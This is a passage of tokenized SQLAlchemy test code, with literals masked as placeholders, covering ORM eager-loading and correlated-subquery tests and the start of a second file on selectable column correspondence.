labelname ) <EOL> user_score = user_score . label ( labelname ) <EOL> else : <EOL> user_score = user_score . as_scalar ( ) <EOL> mapper ( Tag , tags_table , properties = { <EOL> '<STR_LIT>' : sa . orm . column_property ( tag_score ) , <EOL> } ) <EOL> mapper ( User , users_table , properties = { <EOL> '<STR_LIT>' : relationship ( Tag , backref = '<STR_LIT:user>' , lazy = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : sa . orm . 
column_property ( user_score ) , <EOL> } ) <EOL> session = create_session ( ) <EOL> session . add ( User ( name = '<STR_LIT>' , tags = [ Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT> ) , <EOL> Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT:1.0> ) ] ) ) <EOL> session . add ( User ( name = '<STR_LIT:bar>' , tags = [ Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT> ) , <EOL> Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT:1.0> ) , <EOL> Tag ( score1 = <NUM_LIT> , score2 = <NUM_LIT> ) ] ) ) <EOL> session . flush ( ) <EOL> session . expunge_all ( ) <EOL> for user in session . query ( User ) . all ( ) : <EOL> eq_ ( user . query_score , user . prop_score ) <EOL> def go ( ) : <EOL> u = session . query ( User ) . filter_by ( name = '<STR_LIT>' ) . one ( ) <EOL> eq_ ( u . query_score , u . prop_score ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> for t in ( tags_table , users_table ) : <EOL> t . delete ( ) . execute ( ) <EOL> class CorrelatedSubqueryTest ( fixtures . MappedTest ) : <EOL> """<STR_LIT>""" <EOL> __requires__ = ( '<STR_LIT>' , ) <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> ) <EOL> Table ( <EOL> '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:date>' , Date ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> stuff , users = cls . tables . stuff , cls . tables . users <EOL> users . insert ( ) . 
execute ( <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ) <EOL> stuff . insert ( ) . execute ( <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:15> ) } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT:date>' : datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:15> ) } , <EOL> ) <EOL> def test_labeled_on_date_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT:label>' , True , False ) <EOL> def test_scalar_on_date_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT>' , True , False ) <EOL> def test_plain_on_date_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT:none>' , True , False ) <EOL> def test_labeled_on_limitid_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT:label>' , False , False ) <EOL> def test_scalar_on_limitid_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT>' , False , False ) <EOL> def test_plain_on_limitid_noalias ( self ) : <EOL> self . _do_test ( '<STR_LIT:none>' , False , False ) <EOL> def test_labeled_on_date_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT:label>' , True , True ) <EOL> def test_scalar_on_date_alias ( self ) : <EOL> self . 
_do_test ( '<STR_LIT>' , True , True ) <EOL> def test_plain_on_date_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT:none>' , True , True ) <EOL> def test_labeled_on_limitid_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT:label>' , False , True ) <EOL> def test_scalar_on_limitid_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT>' , False , True ) <EOL> def test_plain_on_limitid_alias ( self ) : <EOL> self . _do_test ( '<STR_LIT:none>' , False , True ) <EOL> def _do_test ( self , labeled , ondate , aliasstuff ) : <EOL> stuff , users = self . tables . stuff , self . tables . users <EOL> class User ( fixtures . ComparableEntity ) : <EOL> pass <EOL> class Stuff ( fixtures . ComparableEntity ) : <EOL> pass <EOL> mapper ( Stuff , stuff ) <EOL> if aliasstuff : <EOL> salias = stuff . alias ( ) <EOL> else : <EOL> salias = stuff <EOL> if ondate : <EOL> stuff_view = select ( [ func . max ( salias . c . date ) . label ( '<STR_LIT>' ) ] ) . where ( salias . c . user_id == users . c . id ) . correlate ( users ) <EOL> else : <EOL> stuff_view = select ( [ salias . c . id ] ) . where ( salias . c . user_id == users . c . id ) . correlate ( users ) . order_by ( salias . c . date . desc ( ) ) . limit ( <NUM_LIT:1> ) <EOL> if testing . against ( "<STR_LIT>" ) : <EOL> operator = operators . in_op <EOL> else : <EOL> operator = operators . eq <EOL> if labeled == '<STR_LIT:label>' : <EOL> stuff_view = stuff_view . label ( '<STR_LIT:foo>' ) <EOL> operator = operators . eq <EOL> elif labeled == '<STR_LIT>' : <EOL> stuff_view = stuff_view . as_scalar ( ) <EOL> if ondate : <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Stuff , <EOL> primaryjoin = and_ ( users . c . id == stuff . c . user_id , <EOL> operator ( stuff . c . date , stuff_view ) ) ) <EOL> } ) <EOL> else : <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Stuff , <EOL> primaryjoin = and_ ( users . c . id == stuff . c . 
user_id , <EOL> operator ( stuff . c . id , stuff_view ) ) ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . order_by ( User . name ) . options ( <EOL> joinedload ( '<STR_LIT>' ) ) . all ( ) , <EOL> [ <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:2> ) ] ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:4> ) ] ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:5> ) ] ) <EOL> ] <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . order_by ( User . name ) . first ( ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:2> ) ] ) <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:2> ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . order_by ( User . name ) . options ( <EOL> joinedload ( '<STR_LIT>' ) ) . first ( ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:2> ) ] ) <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . filter ( User . id == <NUM_LIT:2> ) . options ( <EOL> joinedload ( '<STR_LIT>' ) ) . one ( ) , <EOL> User ( name = '<STR_LIT>' , stuff = [ Stuff ( id = <NUM_LIT:4> ) ] ) <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> class CyclicalInheritingEagerTestOne ( fixtures . 
MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT:type>' , String ( <NUM_LIT:30> ) ) <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT:type>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> def test_basic ( self ) : <EOL> t2 , t1 = self . tables . t2 , self . tables . t1 <EOL> class T ( object ) : <EOL> pass <EOL> class SubT ( T ) : <EOL> pass <EOL> class T2 ( object ) : <EOL> pass <EOL> class SubT2 ( T2 ) : <EOL> pass <EOL> mapper ( T , t1 , polymorphic_on = t1 . c . type , polymorphic_identity = '<STR_LIT>' ) <EOL> mapper ( <EOL> SubT , None , inherits = T , polymorphic_identity = '<STR_LIT>' , <EOL> properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> SubT2 , lazy = '<STR_LIT>' , <EOL> backref = sa . orm . backref ( '<STR_LIT>' , lazy = '<STR_LIT>' ) ) <EOL> } ) <EOL> mapper ( T2 , t2 , polymorphic_on = t2 . c . type , polymorphic_identity = '<STR_LIT>' ) <EOL> mapper ( SubT2 , None , inherits = T2 , polymorphic_identity = '<STR_LIT>' ) <EOL> create_session ( ) . query ( SubT ) . all ( ) <EOL> class CyclicalInheritingEagerTestTwo ( fixtures . DeclarativeMappedTest , <EOL> testing . AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . 
DeclarativeBasic <EOL> class PersistentObject ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> class Movie ( PersistentObject ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> director_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> title = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Director ( PersistentObject ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> movies = relationship ( "<STR_LIT>" , foreign_keys = Movie . director_id ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> def test_from_subclass ( self ) : <EOL> Director = self . classes . Director <EOL> s = create_session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Director ) . options ( joinedload ( '<STR_LIT:*>' ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_integrate ( self ) : <EOL> Director = self . classes . Director <EOL> Movie = self . classes . Movie <EOL> session = Session ( testing . db ) <EOL> rscott = Director ( name = "<STR_LIT>" ) <EOL> alien = Movie ( title = "<STR_LIT>" ) <EOL> brunner = Movie ( title = "<STR_LIT>" ) <EOL> rscott . movies . append ( brunner ) <EOL> rscott . movies . append ( alien ) <EOL> session . add_all ( [ rscott , alien , brunner ] ) <EOL> session . commit ( ) <EOL> session . close_all ( ) <EOL> self . d = session . query ( Director ) . options ( joinedload ( '<STR_LIT:*>' ) ) . first ( ) <EOL> assert len ( list ( session ) ) == <NUM_LIT:3> <EOL> class CyclicalInheritingEagerTestThree ( fixtures . DeclarativeMappedTest , <EOL> testing . 
AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> run_create_tables = None <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . DeclarativeBasic <EOL> class PersistentObject ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> __mapper_args__ = { '<STR_LIT>' : "<STR_LIT:*>" } <EOL> class Director ( PersistentObject ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> other_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> other = relationship ( PersistentObject , <EOL> primaryjoin = other_id == PersistentObject . id , <EOL> lazy = False ) <EOL> __mapper_args__ = { "<STR_LIT>" : id == PersistentObject . id } <EOL> def test_gen_query_nodepth ( self ) : <EOL> PersistentObject = self . classes . PersistentObject <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( PersistentObject ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_gen_query_depth ( self ) : <EOL> PersistentObject = self . classes . PersistentObject <EOL> Director = self . classes . Director <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( PersistentObject ) . options ( joinedload ( Director . other ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class EnsureColumnsAddedTest ( <EOL> fixtures . DeclarativeMappedTest , testing . AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> run_create_tables = None <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . 
DeclarativeBasic <EOL> class Parent ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> arb = Column ( Integer , unique = True ) <EOL> data = Column ( Integer ) <EOL> o2mchild = relationship ( "<STR_LIT>" ) <EOL> m2mchild = relationship ( "<STR_LIT>" , secondary = Table ( <EOL> '<STR_LIT>' , Base . metadata , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) ) <EOL> class O2MChild ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> parent_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> class M2MChild ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> def test_joinedload_defered_pk_limit_o2m ( self ) : <EOL> Parent = self . classes . Parent <EOL> s = Session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Parent ) . options ( <EOL> load_only ( '<STR_LIT:data>' ) , <EOL> joinedload ( Parent . o2mchild ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_joinedload_defered_pk_limit_m2m ( self ) : <EOL> Parent = self . classes . Parent <EOL> s = Session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Parent ) . options ( <EOL> load_only ( '<STR_LIT:data>' ) , <EOL> joinedload ( Parent . m2mchild ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_joinedload_defered_pk_o2m ( self ) : <EOL> Parent = self . classes . Parent <EOL> s = Session ( ) <EOL> self . 
assert_compile ( <EOL> s . query ( Parent ) . options ( <EOL> load_only ( '<STR_LIT:data>' ) , <EOL> joinedload ( Parent . o2mchild ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_joinedload_defered_pk_m2m ( self ) : <EOL> Parent = self . classes . Parent <EOL> s = Session ( ) <EOL> self . assert_compile ( <EOL> s . query ( Parent ) . options ( <EOL> load_only ( '<STR_LIT:data>' ) , <EOL> joinedload ( Parent . m2mchild ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class EntityViaMultiplePathTestOne ( fixtures . DeclarativeMappedTest ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . DeclarativeBasic <EOL> class A ( Base ) : <EOL> __tablename__ = '<STR_LIT:a>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> b_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> c_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> b = relationship ( "<STR_LIT:B>" ) <EOL> c = relationship ( "<STR_LIT:C>" ) <EOL> class B ( Base ) : <EOL> __tablename__ = '<STR_LIT:b>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> c_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> c = relationship ( "<STR_LIT:C>" ) <EOL> class C ( Base ) : <EOL> __tablename__ = '<STR_LIT:c>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> d_id = Column ( ForeignKey ( '<STR_LIT>' ) ) <EOL> d = relationship ( "<STR_LIT:D>" ) <EOL> class D ( Base ) : <EOL> __tablename__ = '<STR_LIT:d>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) <EOL> def test_multi_path_load ( self ) : <EOL> A , B , C , D = self . 
classes ( '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' , '<STR_LIT:D>' ) <EOL> s = Session ( ) <EOL> c = C ( d = D ( ) ) <EOL> s . add ( <EOL> A ( b = B ( c = c ) , c = c ) <EOL> ) <EOL> s . commit ( ) <EOL> c_alias_1 = aliased ( C ) <EOL> c_alias_2 = aliased ( C ) <EOL> q = s . query ( A ) <EOL> q = q . join ( A . b ) . join ( c_alias_1 , B . c ) . join ( c_alias_1 . d ) <EOL> q = q . options ( <EOL> contains_eager ( A . b ) . <EOL> contains_eager ( B . c , alias = c_alias_1 ) . <EOL> contains_eager ( C . d ) ) <EOL> q = q . join ( c_alias_2 , A . c ) <EOL> q = q . options ( contains_eager ( A . c , alias = c_alias_2 ) ) <EOL> a1 = q . all ( ) [ <NUM_LIT:0> ] <EOL> in_ ( '<STR_LIT:d>' , a1 . c . __dict__ ) <EOL> class EntityViaMultiplePathTestTwo ( fixtures . DeclarativeMappedTest ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> Base = cls . DeclarativeBasic <EOL> class User ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> data = Column ( Integer ) <EOL> class LD ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> user_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> user = relationship ( User , primaryjoin = user_id == User . id ) <EOL> class A ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> ld_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> ld = relationship ( LD , primaryjoin = ld_id == LD . id ) <EOL> class LDA ( Base ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> ld_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> a_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> a = relationship ( A , primaryjoin = a_id == A . id ) <EOL> ld = relationship ( LD , primaryjoin = ld_id == LD . 
id ) <EOL> def test_multi_path_load ( self ) : <EOL> User , LD , A , LDA = self . classes ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:A>' , '<STR_LIT>' ) <EOL> s = Session ( ) <EOL> u0 = User ( data = <NUM_LIT> ) <EOL> l0 = LD ( user = u0 ) <EOL> z0 = A ( ld = l0 ) <EOL> lz0 = LDA ( ld = l0 , a = z0 ) <EOL> s . add_all ( [ <EOL> u0 , l0 , z0 , lz0 <EOL> ] ) <EOL> s . commit ( ) <EOL> l_ac = aliased ( LD ) <EOL> u_ac = aliased ( User ) <EOL> lz_test = ( s . query ( LDA ) <EOL> . join ( '<STR_LIT>' ) <EOL> . options ( contains_eager ( '<STR_LIT>' ) ) <EOL> . join ( '<STR_LIT:a>' , ( l_ac , '<STR_LIT>' ) , ( u_ac , '<STR_LIT:user>' ) ) <EOL> . options ( contains_eager ( '<STR_LIT:a>' ) <EOL> . contains_eager ( '<STR_LIT>' , alias = l_ac ) <EOL> . contains_eager ( '<STR_LIT:user>' , alias = u_ac ) ) <EOL> . first ( ) ) <EOL> in_ ( <EOL> '<STR_LIT:user>' , lz_test . a . ld . __dict__ <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from sqlalchemy . testing import eq_ , assert_raises , assert_raises_message , is_ <EOL> from sqlalchemy import * <EOL> from sqlalchemy . testing import fixtures , AssertsCompiledSQL , AssertsExecutionResults <EOL> from sqlalchemy . sql import elements <EOL> from sqlalchemy import testing <EOL> from sqlalchemy . sql import util as sql_util , visitors , expression <EOL> from sqlalchemy import exc <EOL> from sqlalchemy . sql import table , column , null <EOL> from sqlalchemy import util <EOL> from sqlalchemy . schema import Column , Table , MetaData <EOL> metadata = MetaData ( ) <EOL> table1 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:20> ) ) , <EOL> Column ( '<STR_LIT>' , Integer ) , <EOL> Column ( '<STR_LIT>' , Integer ) , <EOL> ) <EOL> table2 = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:20> ) ) , <EOL> Column ( '<STR_LIT>' , Integer ) , <EOL> ) <EOL> keyed = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:x>' , Integer , key = '<STR_LIT>' ) , <EOL> Column ( '<STR_LIT:y>' , Integer , key = '<STR_LIT>' ) , <EOL> Column ( '<STR_LIT:z>' , Integer ) , <EOL> ) <EOL> class SelectableTest ( <EOL> fixtures . TestBase , <EOL> AssertsExecutionResults , <EOL> AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_indirect_correspondence_on_labels ( self ) : <EOL> s = select ( [ table1 . c . col1 . label ( '<STR_LIT>' ) , table1 . c . col1 , <EOL> table1 . c . col1 . label ( '<STR_LIT>' ) ] ) <EOL> assert s . corresponding_column ( table1 . c . col1 ) is s . c . col1 <EOL> assert s . corresponding_column ( s . c . col1 ) is s . c . col1 <EOL> assert s . corresponding_column ( s . c . c1 ) is s . c . 
c1 <EOL> def test_labeled_subquery_twice ( self ) : <EOL> scalar_select = select ( [ table1 . c . col1 ] ) . label ( '<STR_LIT:foo>' ) <EOL> s1 = select ( [ scalar_select ] ) <EOL> s2 = select ( [ scalar_select , scalar_select ] ) <EOL> eq_ ( <EOL> s1 . c . foo . proxy_set , <EOL> set ( [ s1 . c . foo , scalar_select , scalar_select . element ] ) <EOL> ) <EOL> eq_ ( <EOL> s2 . c . foo . proxy_set , <EOL> set ( [ s2 . c . foo , scalar_select , scalar_select . element ] ) <EOL> ) <EOL> assert s1 . corresponding_column ( scalar_select ) is s1 . c . foo <EOL> assert s2 . corresponding_column ( scalar_select ) is s2 . c . foo <EOL> def test_label_grouped_still_corresponds ( self ) : <EOL> label = select ( [ table1 . c . col1 ] ) . label ( '<STR_LIT:foo>' ) <EOL> label2 = label . self_group ( ) <EOL> s1 = select ( [ label ] ) <EOL> s2 = select ( [ label2 ] ) <EOL> assert s1 . corresponding_column ( label ) is s1 . c . foo <EOL> assert s2 . corresponding_column ( label ) is s2 . c . foo <EOL> def test_direct_correspondence_on_labels ( self ) : <EOL> l1 , l2 = table1 . c . col1 . label ( '<STR_LIT:foo>' ) , table1 . c . col1 . label ( '<STR_LIT:bar>' ) <EOL> sel = select ( [ l1 , l2 ] ) <EOL> sel2 = sel . alias ( ) <EOL> assert sel2 . corresponding_column ( l1 ) is sel2 . c . foo <EOL> assert sel2 . corresponding_column ( l2 ) is sel2 . c . bar <EOL> sel2 = select ( [ table1 . c . col1 . label ( '<STR_LIT:foo>' ) , table1 . c . col2 . label ( '<STR_LIT:bar>' ) ] ) <EOL> sel3 = sel . union ( sel2 ) . alias ( ) <EOL> assert sel3 . corresponding_column ( l1 ) is sel3 . c . foo <EOL> assert sel3 . corresponding_column ( l2 ) is sel3 . c . bar <EOL> def test_keyed_gen ( self ) : <EOL> s = select ( [ keyed ] ) <EOL> eq_ ( s . c . colx . key , '<STR_LIT>' ) <EOL> eq_ ( s . c . colx . name , '<STR_LIT:x>' ) <EOL> assert s . corresponding_column ( keyed . c . colx ) is s . c . colx <EOL> assert s . corresponding_column ( keyed . c . coly ) is s . c . coly <EOL> assert s . 
corresponding_column ( keyed . c . z ) is s . c . z <EOL> sel2 = s . alias ( ) <EOL> assert sel2 . corresponding_column ( keyed . c . colx ) is sel2 . c . colx <EOL> assert sel2 . corresponding_column ( keyed . c . coly ) is sel2 . c . coly <EOL> assert sel2 . corresponding_column ( keyed . c . z ) is sel2 . c . z <EOL> def test_keyed_label_gen ( self ) : <EOL> s = select ( [ keyed ] ) . apply_labels ( ) <EOL> assert s . corresponding_column ( keyed . c . colx ) is s . c . keyed_colx <EOL> assert s . corresponding_column ( keyed . c . coly ) is s . c . keyed_coly <EOL> assert s . corresponding_column ( keyed . c . z ) is s . c . keyed_z <EOL> sel2 = s . alias ( ) <EOL> assert sel2 . corresponding_column ( keyed . c . colx ) is sel2 . c . keyed_colx <EOL> assert sel2 . corresponding_column ( keyed . c . coly ) is sel2 . c . keyed_coly <EOL> assert sel2 . corresponding_column ( keyed . c . z ) is sel2 . c . keyed_z <EOL> def test_keyed_c_collection_upper ( self ) : <EOL> c = Column ( '<STR_LIT:foo>' , Integer , key = '<STR_LIT:bar>' ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c ) <EOL> is_ ( t . c . bar , c ) <EOL> def test_keyed_c_collection_lower ( self ) : <EOL> c = column ( '<STR_LIT:foo>' ) <EOL> c . key = '<STR_LIT:bar>' <EOL> t = table ( '<STR_LIT:t>' , c ) <EOL> is_ ( t . c . bar , c ) <EOL> def test_clone_c_proxy_key_upper ( self ) : <EOL> c = Column ( '<STR_LIT:foo>' , Integer , key = '<STR_LIT:bar>' ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c ) <EOL> s = select ( [ t ] ) . _clone ( ) <EOL> assert c in s . c . bar . proxy_set <EOL> def test_clone_c_proxy_key_lower ( self ) : <EOL> c = column ( '<STR_LIT:foo>' ) <EOL> c . key = '<STR_LIT:bar>' <EOL> t = table ( '<STR_LIT:t>' , c ) <EOL> s = select ( [ t ] ) . _clone ( ) <EOL> assert c in s . c 